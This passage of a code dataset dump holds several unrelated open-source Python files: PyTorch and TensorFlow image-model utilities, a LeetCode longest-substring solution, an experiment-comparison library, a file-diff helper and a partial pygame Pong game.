int(x_shape[2]), int(x_shape[3])) # (b*c, h, w)\n offset_h = offset_h.contiguous().view(-1, int(x_shape[2]), int(x_shape[3])) # (b*c, h, w)\n if not self.input_shape or self.input_shape != x_shape:\n self.input_shape = x_shape\n grid_w, grid_h = np.meshgrid(np.linspace(-1, 1, x_shape[3]), np.linspace(-1, 1, x_shape[2])) # (h, w)\n grid_w = torch.Tensor(grid_w)\n grid_h = torch.Tensor(grid_h)\n if self.cuda:\n grid_w = grid_w.cuda()\n grid_h = grid_h.cuda()\n self.grid_w = nn.Parameter(grid_w)\n self.grid_h = nn.Parameter(grid_h)\n offset_w = offset_w + self.grid_w # (b*c, h, w)\n offset_h = offset_h + self.grid_h # (b*c, h, w)\n x = x.contiguous().view(-1, int(x_shape[2]), int(x_shape[3])).unsqueeze(1) # (b*c, 1, h, w)\n x = F.grid_sample(x, torch.stack((offset_h, offset_w), 3)) # (b*c, h, w)\n x = x.contiguous().view(-1, int(x_shape[1]), int(x_shape[2]), int(x_shape[3])) # (b, c, h, w)\n x = self.regular_filter(x)\n return x\n\n\ndef sliced_forward(single_forward):\n def _pad(x, crop_size):\n h, w = x.size()[2:]\n pad_h = max(crop_size - h, 0)\n pad_w = max(crop_size - w, 0)\n x = F.pad(x, (0, pad_w, 0, pad_h))\n return x, pad_h, pad_w\n\n def wrapper(self, x):\n batch_size, _, ori_h, ori_w = x.size()\n if self.training and self.use_aux:\n outputs_all_scales = Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n aux_all_scales = Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n for s in self.scales:\n new_size = (int(ori_h * s), int(ori_w * s))\n scaled_x = F.upsample(x, size=new_size, mode='bilinear')\n scaled_x = Variable(scaled_x).cuda()\n scaled_h, scaled_w = scaled_x.size()[2:]\n long_size = max(scaled_h, scaled_w)\n print(scaled_x.size())\n\n if long_size > self.crop_size:\n count = torch.zeros((scaled_h, scaled_w))\n outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n aux_outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n stride = int(ceil(self.crop_size * self.stride_rate))\n h_step_num = int(ceil((scaled_h - self.crop_size) / stride)) + 1\n w_step_num = int(ceil((scaled_w - self.crop_size) / stride)) + 1\n for yy in range(h_step_num):\n for xx in range(w_step_num):\n sy, sx = yy * stride, xx * stride\n ey, ex = sy + self.crop_size, sx + self.crop_size\n x_sub = scaled_x[:, :, sy: ey, sx: ex]\n x_sub, pad_h, pad_w = _pad(x_sub, self.crop_size)\n print(x_sub.size())\n outputs_sub, aux_sub = single_forward(self, x_sub)\n\n if sy + self.crop_size > scaled_h:\n outputs_sub = outputs_sub[:, :, : -pad_h, :]\n aux_sub = aux_sub[:, :, : -pad_h, :]\n\n if sx + self.crop_size > scaled_w:\n outputs_sub = outputs_sub[:, :, :, : -pad_w]\n aux_sub = aux_sub[:, :, :, : -pad_w]\n\n outputs[:, :, sy: ey, sx: ex] = outputs_sub\n aux_outputs[:, :, sy: ey, sx: ex] = aux_sub\n\n count[sy: ey, sx: ex] += 1\n count = Variable(count).cuda()\n outputs = (outputs / count)\n aux_outputs = (outputs / count)\n else:\n scaled_x, pad_h, pad_w = _pad(scaled_x, self.crop_size)\n outputs, aux_outputs = single_forward(self, scaled_x)\n outputs = outputs[:, :, : -pad_h, : -pad_w]\n aux_outputs = aux_outputs[:, :, : -pad_h, : -pad_w]\n outputs_all_scales += outputs\n aux_all_scales += aux_outputs\n return outputs_all_scales / len(self.scales), aux_all_scales\n else:\n outputs_all_scales = Variable(torch.zeros((batch_size, self.num_classes, ori_h, ori_w))).cuda()\n for s in self.scales:\n new_size = (int(ori_h * s), int(ori_w * s))\n scaled_x = F.upsample(x, size=new_size, mode='bilinear')\n scaled_h, scaled_w = scaled_x.size()[2:]\n long_size = max(scaled_h, scaled_w)\n\n if long_size > self.crop_size:\n count = torch.zeros((scaled_h, scaled_w))\n outputs = Variable(torch.zeros((batch_size, self.num_classes, scaled_h, scaled_w))).cuda()\n stride = int(ceil(self.crop_size * self.stride_rate))\n h_step_num = int(ceil((scaled_h - self.crop_size) / stride)) + 1\n w_step_num = int(ceil((scaled_w - self.crop_size) / stride)) + 1\n for yy in range(h_step_num):\n for xx in range(w_step_num):\n sy, sx = yy * stride, xx * stride\n ey, ex = sy + self.crop_size, sx + self.crop_size\n x_sub = scaled_x[:, :, sy: ey, sx: ex]\n x_sub, pad_h, pad_w = _pad(x_sub, self.crop_size)\n\n outputs_sub = single_forward(self, x_sub)\n\n if sy + self.crop_size > scaled_h:\n outputs_sub = outputs_sub[:, :, : -pad_h, :]\n\n if sx + self.crop_size > scaled_w:\n outputs_sub = outputs_sub[:, :, :, : -pad_w]\n\n outputs[:, :, sy: ey, sx: ex] = outputs_sub\n\n count[sy: ey, sx: ex] += 1\n count = Variable(count).cuda()\n outputs = (outputs / count)\n else:\n scaled_x, pad_h, pad_w = _pad(scaled_x, self.crop_size)\n outputs = single_forward(self, scaled_x)\n outputs = outputs[:, :, : -pad_h, : -pad_w]\n outputs_all_scales += outputs\n return outputs_all_scales\n\n return wrapper\n\n\nclass Progress:\n \"\"\"Determine the progress parameter of the training given the epoch and the progression in the epoch\n Args:\n n_iter (int): the number of epochs before changing the progress,\n pmax (int): the maximum progress of the training.\n batchSizeList (list): the list of the batchSize to adopt during the training\n \"\"\"\n\n def __init__(self, n_iter, pmax, batchSizeList):\n assert n_iter > 0 and isinstance(n_iter, int), 'n_iter must be int >= 1'\n assert pmax >= 0 and isinstance(pmax, int), 'pmax must be int >= 0'\n assert isinstance(batchSizeList, list) and \\\n all(isinstance(x, int) for x in batchSizeList) and \\\n all(x > 0 for x in batchSizeList) and \\\n len(batchSizeList) == pmax + 1, \\\n 'batchSizeList must be a list of int > 0 and of length pmax+1'\n\n self.n_iter = n_iter\n self.pmax = pmax\n self.p = 0\n self.batchSizeList = batchSizeList\n\n def progress(self, epoch, i, total):\n \"\"\"Update the progress given the epoch and the iteration of the epoch\n Args:\n epoch (int): batch of images to resize\n i (int): iteration in the epoch\n total (int): total number of iterations in the epoch\n \"\"\"\n x = (epoch + i / total) / self.n_iter\n self.p = min(max(int(x / 2), x - ceil(x / 2), 0), self.pmax)\n return self.p\n\n def resize(self, images):\n \"\"\"Resize the images w.r.t the current value of the progress.\n Args:\n images (Variable or Tensor): batch of images to resize\n \"\"\"\n x = int(ceil(self.p))\n if x >= self.pmax:\n return images\n else:\n return F.adaptive_avg_pool2d(images, 4 * 2 ** x)\n\n @property\n def batchSize(self):\n \"\"\"Returns the current batchSize w.r.t the current value of the progress\"\"\"\n x = int(ceil(self.p))\n return self.batchSizeList[x]\n","repo_name":"PollastriFederico/3D-self-attention","sub_path":"deep_learning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16887,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"26329042973","text":"import tensorflow as tf\n\nfrom tfimm.layers import norm_layer_factory\n\nfrom .common import MLPBlock\n\n\nclass TwoWayTransformer(tf.keras.Model):\n def __init__(\n self,\n embed_dim: int,\n nb_blocks: int,\n nb_heads: int,\n mlp_dim: int,\n attention_downsample_rate: int,\n act_layer: str,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.nb_blocks = nb_blocks\n self.nb_heads = nb_heads\n self.mlp_dim = mlp_dim\n self.attention_downsample_rate = attention_downsample_rate\n self.act_layer = act_layer\n\n norm_layer = norm_layer_factory(\"layer_norm\")\n\n self.blocks = [\n TwoWayAttentionBlock(\n embed_dim=self.embed_dim,\n nb_heads=self.nb_heads,\n mlp_dim=self.mlp_dim,\n attention_downsample_rate=self.attention_downsample_rate,\n skip_first_layer_pe=j == 0,\n act_layer=self.act_layer,\n name=f\"layers/{j}\",\n )\n for j in range(self.nb_blocks)\n ]\n self.final_attn_token_to_image = DownsampleAttention(\n embed_dim=self.embed_dim,\n nb_heads=self.nb_heads,\n downsample_rate=self.attention_downsample_rate,\n name=\"final_attn_token_to_image\",\n )\n self.norm_final_attn = norm_layer(name=\"norm_final_attn\")\n\n def call(self, inputs, training=False):\n \"\"\"\n Args:\n inputs: Dictionary with the following entries.\n point_embeddings: Point embedding, should have shape (B, N, embed_dim)\n for any N.\n image_embeddings: Image to attend to. Should have the shape\n (B, H, W, embed_dim) for any (H, W).\n image_pe: Positional encoding to add to the image. Must have the same\n shape as image_embedding.\n training: Training or inference mode?\n\n Returns:\n The processed point_embedding, same shape as input.\n The processed image_embedding, same shape as input. Note that this differs\n from PyTorch, where the output has shape (B, H*W, embed_dim).\n \"\"\"\n image_embeddings = inputs[\"image_embeddings\"]\n image_pe = inputs[\"image_pe\"]\n point_embeddings = inputs[\"point_embeddings\"]\n b, h, w, c = tf.unstack(tf.shape(image_embeddings))\n\n image_embedding = tf.reshape(image_embeddings, (b, -1, c)) # (B, H*W, C)\n image_pe = tf.reshape(image_pe, (b, -1, c)) # (B, H*W, C)\n\n # Prepare queries\n queries = point_embeddings\n keys = image_embedding\n\n # Apply transformer blocks\n for block in self.blocks:\n queries, keys = block(\n {\"q\": queries, \"k\": keys, \"q_pe\": point_embeddings, \"k_pe\": image_pe},\n training=training,\n )\n\n # Apply final attention layer from the points to the image\n attn = self.final_attn_token_to_image(\n {\"q\": queries + point_embeddings, \"k\": keys + image_pe, \"v\": keys},\n training=training,\n )\n queries = queries + attn\n queries = self.norm_final_attn(queries, training=training)\n\n # Reshape back to (B, H, W, C)\n keys = tf.reshape(keys, (b, h, w, c))\n\n return queries, keys\n\n\nclass TwoWayAttentionBlock(tf.keras.layers.Layer):\n def __init__(\n self,\n embed_dim: int,\n nb_heads: int,\n mlp_dim: int,\n attention_downsample_rate: int,\n skip_first_layer_pe: bool,\n act_layer: str,\n **kwargs,\n ):\n \"\"\"\n A transformer block with four layers:\n (1) self-attention of sparse inputs,\n (2) cross attention of sparse inputs to dense inputs,\n (3) mlp block on sparse inputs, and\n (4) cross attention of dense inputs to sparse inputs.\n\n Args:\n embed_dim: the channel dimension of the embeddings\n num_heads: the number of heads in the attention layers\n mlp_dim: the hidden dimension of the mlp block\n skip_first_layer_pe: skip the PE on the first layer\n act_layer: the activation of the mlp block\n \"\"\"\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.nb_heads = nb_heads\n self.mlp_dim = mlp_dim\n self.attention_downsample_rate = attention_downsample_rate\n self.skip_first_layer_pe = skip_first_layer_pe\n self.act_layer = act_layer\n\n norm_layer = norm_layer_factory(\"layer_norm\")\n\n self.self_attn = DownsampleAttention(\n embed_dim=embed_dim, nb_heads=nb_heads, downsample_rate=1, name=\"self_attn\"\n )\n self.norm1 = norm_layer(name=\"norm1\")\n\n self.cross_attn_token_to_image = DownsampleAttention(\n embed_dim=embed_dim,\n nb_heads=nb_heads,\n downsample_rate=attention_downsample_rate,\n name=\"cross_attn_token_to_image\",\n )\n self.norm2 = norm_layer(name=\"norm2\")\n\n self.mlp = MLPBlock(\n hidden_dim=self.mlp_dim,\n embed_dim=self.embed_dim,\n act_layer=self.act_layer,\n drop_rate=0.0,\n name=\"mlp\",\n )\n self.norm3 = norm_layer(name=\"norm3\")\n\n self.cross_attn_image_to_token = DownsampleAttention(\n embed_dim=embed_dim,\n nb_heads=nb_heads,\n downsample_rate=attention_downsample_rate,\n name=\"cross_attn_image_to_token\",\n )\n self.norm4 = norm_layer(name=\"norm4\")\n\n def call(self, inputs, training=False):\n q, k, q_pe, k_pe = inputs[\"q\"], inputs[\"k\"], inputs[\"q_pe\"], inputs[\"k_pe\"]\n\n # Self-attention block\n if self.skip_first_layer_pe:\n q = self.self_attn({\"q\": q, \"k\": q, \"v\": q}, training=training)\n else:\n attn = self.self_attn({\"q\": q + q_pe, \"k\": q + q_pe, \"v\": q})\n q = q + attn\n q = self.norm1(q, training=training)\n\n # Cross-attention block, tokens attending to image embedding\n attn = self.cross_attn_token_to_image(\n {\"q\": q + q_pe, \"k\": k + k_pe, \"v\": k}, training=training\n )\n q = q + attn\n q = self.norm2(q, training=training)\n\n # MLP block\n mlp = self.mlp(q, training=training)\n q = q + mlp\n q = self.norm3(q, training=training)\n\n # Cross-attention block, image embeddings attending to tokens\n attn = self.cross_attn_image_to_token(\n {\"q\": k + k_pe, \"k\": q + q_pe, \"v\": q}, training=training\n )\n k = k + attn\n k = self.norm4(k, training=training)\n\n return q, k\n\n\nclass DownsampleAttention(tf.keras.layers.Layer):\n \"\"\"\n An attention layer that allows for downscaling the size of the embedding after\n projection to queries, keys, and values.\n \"\"\"\n\n def __init__(\n self,\n embed_dim: int,\n nb_heads: int,\n downsample_rate: int,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.embed_dim = embed_dim\n self.nb_heads = nb_heads\n self.downsample_rate = downsample_rate\n\n internal_dim = self.embed_dim // self.downsample_rate\n self.q_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"q_proj\")\n self.k_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"k_proj\")\n self.v_proj = tf.keras.layers.Dense(internal_dim, use_bias=True, name=\"v_proj\")\n self.out_proj = tf.keras.layers.Dense(\n units=self.embed_dim, use_bias=True, name=\"out_proj\"\n )\n\n def _separate_heads(self, x: tf.Tensor):\n b, m, c = tf.shape(x)[0], tf.shape(x)[1], tf.shape(x)[2] # (B, M, C)\n x = tf.reshape(x, (b, m, self.nb_heads, c // self.nb_heads)) # (B, M, Hd, C/Hd)\n x = tf.transpose(x, (0, 2, 1, 3)) # (B, Hd, M, C/Hd)\n return x\n\n def _recombine_heads(self, x: tf.Tensor):\n # Shape of x is (B, Hd, M, C/Hd)\n batch_size, _, seq_length, _ = tf.unstack(tf.shape(x))\n x = tf.transpose(x, (0, 2, 1, 3)) # (B, M, Hd, C/Hd)\n x = tf.reshape(x, (batch_size, seq_length, -1)) # (B, M, C)\n return x\n\n def call(self, inputs):\n q, k, v = inputs[\"q\"], inputs[\"k\"], inputs[\"v\"]\n\n # Input projections\n q = self.q_proj(q)\n k = self.k_proj(k)\n v = self.v_proj(v)\n\n # Separate into heads\n q = self._separate_heads(q)\n k = self._separate_heads(k)\n v = self._separate_heads(v)\n\n # Attention\n d = tf.shape(q)[-1] # D=C/Hd\n attn = tf.matmul(q, k, transpose_b=True) # (B, Hd, M, M)\n attn = attn / tf.sqrt(tf.cast(d, tf.float32))\n attn = tf.nn.softmax(attn, axis=-1) # (B, Hd, M, M)\n\n # Get output\n x = tf.matmul(attn, v) # (B, Hd, M, C/Hd)\n x = self._recombine_heads(x) # (B, M, C)\n x = self.out_proj(x)\n\n return x\n","repo_name":"martinsbruveris/tensorflow-image-models","sub_path":"tfimm/architectures/segment_anything/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9031,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"40"} +{"seq_id":"31347878194","text":"''' q_3 无重复字符的最长子串\n给定一个字符串,请你找出其中不含有重复字符的 最长子串 的长度。\n\n示例 1:\n\n输入: \"abcabcbb\"\n输出: 3\n解释: 因为无重复字符的最长子串是 \"abc\",所以其长度为 3。\n示例 2:\n\n输入: \"bbbbb\"\n输出: 1\n解释: 因为无重复字符的最长子串是 \"b\",所以其长度为 1。\n示例 3:\n\n输入: \"pwwkew\"\n输出: 3\n解释: 因为无重复字符的最长子串是 \"wke\",所以其长度为 3。\n  请注意,你的答案必须是 子串 的长度,\"pwke\" 是一个子序列,不是子串。\n'''\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n if not s:\n return 0\n cur_len = 0\n max_len = 0\n left = 0\n alpha = set()\n for letter in s:\n cur_len += 1\n if letter not in alpha:\n alpha.add(letter)\n else:\n while letter in alpha:\n alpha.remove(s[left])\n left += 1\n cur_len -= 1\n alpha.add(letter)\n if cur_len > max_len:\n max_len = cur_len\n return max_len\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.lengthOfLongestSubstring('dvdef'))\n # 'defabcdfe'\n","repo_name":"NoteXYX/leetcode","sub_path":"q_3.py","file_name":"q_3.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12851494683","text":"from random import random, sample\nfrom functools import wraps\nfrom logging import getLogger\n\nfrom .settings import settings, ConfigurationError\nfrom .utils import Timer\n\nlogger = getLogger(__name__)\n\n\nclass Experiment(object):\n \"\"\"\n Establish a function as the basis for an experiment.\n\n >>> @Experiment(new_unverified_fn)\n ... def old_known_fn():\n ... ...\n \"\"\"\n _control = None\n\n def __init__(self, behaviors=(), control=None, name=None, **options):\n self.behaviors = set([behaviors] if callable(behaviors) else behaviors)\n # Control function can also be specified as a decorator via __call__\n self.control = control\n if control is not None:\n self.behaviors.add(self.control)\n\n self._name = name\n self._compare = options.pop('compare', None)\n self.context = options.pop('context', {})\n\n # Settings\n self.chance = options.get('chance', settings.chance)\n self.raise_on_mismatches = options.get(\n 'raise_on_mismatches', settings.raise_on_mismatches)\n\n @property\n def name(self):\n return self._name or (\n self.control.__name__ if self.control else self.__name__)\n\n @property\n def control(self):\n return self._control\n\n @control.setter\n def control(self, value):\n if self._control is not None:\n raise ConfigurationError(\n \"The control function should only be set once.\"\n )\n self._control = value\n\n def __call__(self, control):\n \"\"\"\n Wrap a control function.\n \"\"\"\n self.control = control\n self.behaviors.add(control)\n\n @wraps(control)\n def wrapper(*args, **kwargs):\n return self.run(*args, **kwargs)\n\n wrapper.experiment = self\n return wrapper\n\n @property\n def should_run_experiment(self):\n return len(self.behaviors) > 1 and settings.chance > random()\n\n def run(self, *args, **kwargs):\n # Always run the control behavior, but allow other behaviors to run\n # intermittently.\n if self.should_run_experiment:\n behaviors = sample(self.behaviors, len(self.behaviors))\n else:\n behaviors = [self.control]\n\n result = Result(self, behaviors, args, kwargs)\n try:\n for ix, behavior in enumerate(behaviors):\n result.timed_run(behavior, *args, **kwargs)\n finally:\n # If control raised an exception, some of the other behaviors may\n # not have run yet. Keep going.\n for behavior in behaviors[ix+1:]:\n result.timed_run(behavior, *args, **kwargs)\n\n self.publish(result)\n\n # Mismatch exceptions should supersede a control's exception\n should_raise = (\n self.raise_on_mismatches and\n not result.observations_are_equivalent\n )\n if should_raise:\n raise ObservationMismatchError(\n \"Observations are not equivalent\", result)\n\n # If control didn't throw an exception, return its value.\n return result.control_observation.value\n\n def compare(self, control_result, experimental_result):\n _compare = getattr(self, '_compare', lambda x, y: x == y)\n \"\"\"\n Return true if the results match.\n \"\"\"\n return (\n # Mismatch if only one of the results returned an error, or if\n # different types of errors were returned.\n type(control_result.error) is type(experimental_result.error) and\n _compare(control_result.value, experimental_result.value)\n )\n\n def publish(self, result):\n if result.observations_are_equivalent:\n logger.info(u\"Observations for {e.name} match!\".format(e=self))\n else:\n logger.error(\n u\"Observations for {e.name} don't match!\".format(e=self))\n\n\nclass Result(object):\n \"\"\"\n A single run of an experiment.\n \"\"\"\n def __init__(self, experiment, behaviors, args, kwargs):\n self.experiment = experiment\n self.behaviors = behaviors\n self.observations = []\n self.args = args\n self.kwargs = kwargs\n\n def timed_run(self, behavior, *args, **kwargs):\n timer = Timer()\n try:\n value = behavior(*args, **kwargs)\n self.observations.append(Observation(value, None, timer.stop()))\n except Exception as ex:\n self.observations.append(Observation(None, ex, timer.stop()))\n if behavior is self.experiment.control:\n raise\n\n @property\n def control_observation(self):\n for behavior, observation in zip(self.behaviors, self.observations):\n if behavior is self.experiment.control:\n return observation\n\n def observations_are_equivalent(self):\n control_observation = self.control_observation\n for behavior, observation in zip(self.behaviors, self.observations):\n is_equivalent = (\n behavior is self.experiment.control or\n self.experiment.compare(control_observation, observation))\n if not is_equivalent:\n return False\n return True\n\n\nclass Observation(object):\n def __init__(self, value, error, duration):\n self.value = value\n self.error = error\n self.duration = duration\n\n\nclass ObservationMismatchError(Exception):\n pass\n","repo_name":"staticshock/scientist.py","sub_path":"scientist/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"7079230887","text":"from data.data_layer import DataLayer\nfrom logging import getLogger\n\nlogger = getLogger('waes')\n\n\ndef compare_files(id, data_layer=''):\n side = 'left'\n dl = data_layer if data_layer else DataLayer()\n try:\n left = dl.get(id, side)\n side = 'right'\n right = dl.get(id, side)\n except IOError:\n msg = 'File with id = %s and side = %s is not provided' % (id, side)\n raise IOError(msg)\n return compare(left, right)\n\n\ndef compare(left, right):\n # left length != right length\n if len(left) != len(right):\n return {'payload': 'Different length'}\n # left == right\n if left == right:\n return {'payload': 'Equal'}\n # left and right are diffrent\n out_data = []\n diff_counter = 0\n offset = -1\n for i in xrange(len(left)):\n\n if left[i] == right[i]:\n if diff_counter != 0:\n # if found equal symbols reset \n # diff_counter and offset, save data\n out_data.append({'offset': offset, 'length': diff_counter})\n diff_counter = 0\n offset = -1\n else:\n if offset < 0:\n # if the first differnt synmbols save to offset the beginng\n offset = i\n diff_counter += 1\n\n if diff_counter > 0:\n out_data.append({'offset': offset, 'length': diff_counter})\n return {'payload': out_data}\n","repo_name":"apelsin83/jobinterviews","sub_path":"waes/bl/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11785375058","text":"import pygame\r\nfrom random import randint as R_randint\r\npygame.font.init()\r\n\r\n# Game settings;\r\nFPS = 240\r\nWIDTH, HEIGHT = 600, 500\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\nPLAYER_MOVEMENT_VEL = 3\r\nPLAYER_HEIGHT = 70\r\nPLAYER_WIDTH = 12\r\nGAME_BALL_SIZE = 10\r\nGAME_BALL_STATE = {\"x\": (WIDTH//2)-GAME_BALL_SIZE//2, \"y\": (HEIGHT//2)-GAME_BALL_SIZE//2}\r\nGAME_HAS_STARTED = False\r\nGAME_BALL_VELOCITY = 1\r\nGAME_BALL_MOVE_SIDE = \"\"\r\n\r\n# Colors;\r\nRED = (255, 0, 0)\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\n\r\n# Players;\r\nPLAYER_ONE = pygame.Rect(10, (HEIGHT//2)-7, PLAYER_WIDTH, PLAYER_HEIGHT)\r\nPLAYER_TWO = pygame.Rect(WIDTH-24, (HEIGHT//2)-7, PLAYER_WIDTH, PLAYER_HEIGHT)\r\nPLAYER_ONE_AIMING = \"right\"\r\nPLAYER_TWO_AIMING = \"left\"\r\n\r\n# App settings;\r\npygame.display.set_caption(\"Pong\")\r\n\r\ndef gameEndsFunc(whoWon):\r\n comicFont = pygame.font.SysFont('Comic Sans MS', 70)\r\n WIN.blit(comicFont.render(str(whoWon) + \" wins!\", 1, (RED)), ((WIDTH//2)-220, 200))\r\n pygame.display.update()\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n \r\n# The ball moving settings;\r\ndef moveBallF():\r\n global GAME_BALL_MOVE_SIDE\r\n # print(GAME_BALL_STATE)\r\n \r\n if GAME_BALL_MOVE_SIDE == \"left\":\r\n GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n if PLAYER_ONE_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"right\":\r\n GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x-PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n if PLAYER_TWO_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"upleft\":\r\n GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]-=GAME_BALL_VELOCITY\r\n\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n if PLAYER_ONE_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"upright\":\r\n GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]-=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x-PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n if PLAYER_TWO_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"downleft\":\r\n GAME_BALL_STATE[\"x\"]-=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]+=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_ONE.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_ONE.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_ONE.y-PLAYER_HEIGHT:\r\n if PLAYER_ONE_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n\r\n elif GAME_BALL_MOVE_SIDE == \"downright\":\r\n GAME_BALL_STATE[\"x\"]+=GAME_BALL_VELOCITY\r\n GAME_BALL_STATE[\"y\"]+=GAME_BALL_VELOCITY\r\n if GAME_BALL_STATE[\"x\"] == PLAYER_TWO.x+PLAYER_WIDTH and GAME_BALL_STATE[\"y\"] < PLAYER_TWO.y+PLAYER_HEIGHT and GAME_BALL_STATE[\"y\"] > PLAYER_TWO.y-PLAYER_HEIGHT:\r\n if PLAYER_TWO_AIMING == \"up\":\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n\r\n # border colisions;\r\n if GAME_BALL_MOVE_SIDE == \"upleft\" and GAME_BALL_STATE[\"y\"] <= 80+GAME_BALL_SIZE:\r\n GAME_BALL_MOVE_SIDE = \"downleft\"\r\n elif GAME_BALL_MOVE_SIDE == \"upright\" and GAME_BALL_STATE[\"y\"] <= 80+GAME_BALL_SIZE:\r\n GAME_BALL_MOVE_SIDE = \"downright\"\r\n elif GAME_BALL_MOVE_SIDE == \"downleft\" and GAME_BALL_STATE[\"y\"] > HEIGHT:\r\n GAME_BALL_MOVE_SIDE = \"upleft\"\r\n elif GAME_BALL_MOVE_SIDE == \"downright\" and GAME_BALL_STATE[\"y\"] > HEIGHT:\r\n GAME_BALL_MOVE_SIDE = \"upright\"\r\n\r\n # Checking for wins\r\n if GAME_BALL_STATE[\"x\"] > WIDTH:\r\n gameEndsFunc(\"Player-1\")\r\n if GAME_BALL_STATE[\"x\"] < 0:\r\n gameEndsFunc(\"Player-2\")\r\n\r\ndef reRenderScreen(hpText, topBorder, fpsText):\r\n # Refreshing the screen;\r\n WIN.fill(BLACK)\r\n\r\n # The top text and borders;\r\n WIN.blit(hpText, ((WIDTH//2)-50, 0))\r\n pygame.display.set_caption(\"Pong [FPS:\" + str(fpsText) + \"]\")\r\n pygame.draw.rect(WIN, WHITE, topBorder)\r\n # Rendering the players;\r\n pygame.draw.rect(WIN, RED, PLAYER_ONE)\r\n pygame.draw.rect(WIN, RED, PLAYER_TWO)\r\n\r\n # The *ball* for the game;\r\n pygame.draw.circle(WIN, WHITE, (GAME_BALL_STATE[\"x\"], GAME_BALL_STATE[\"y\"]), GAME_BALL_SIZE)\r\n\r\n pygame.display.update()\r\n\r\ndef movePlayerOne(keys_pressed):\r\n global PLAYER_ONE_AIMING\r\n if keys_pressed[pygame.K_w] and PLAYER_ONE.y > 90:\r\n PLAYER_ONE.y -= PLAYER_MOVEMENT_VEL\r\n PLAYER_ONE_AIMING = \"up\"\r\n if keys_pressed[pygame.K_s] and PLAYER_ONE.y < HEIGHT-PLAYER_HEIGHT:\r\n PLAYER_ONE.y += PLAYER_MOVEMENT_VEL\r\n PLAYER_ONE_AIMING = \"down\"\r\n\r\ndef movePlayerTwo(keys_pressed):\r\n global PLAYER_TWO_AIMING\r\n if keys_pressed[pygame.K_UP] and PLAYER_TWO.y > 90:\r\n PLAYER_TWO.y -= PLAYER_MOVEMENT_VEL\r\n PLAYER_TWO_AIMING = \"up\"\r\n if keys_pressed[pygame.K_DOWN] and PLAYER_TWO.y < HEIGHT-PLAYER_HEIGHT:\r\n PLAYER_TWO.y += PLAYER_MOVEMENT_VEL\r\n 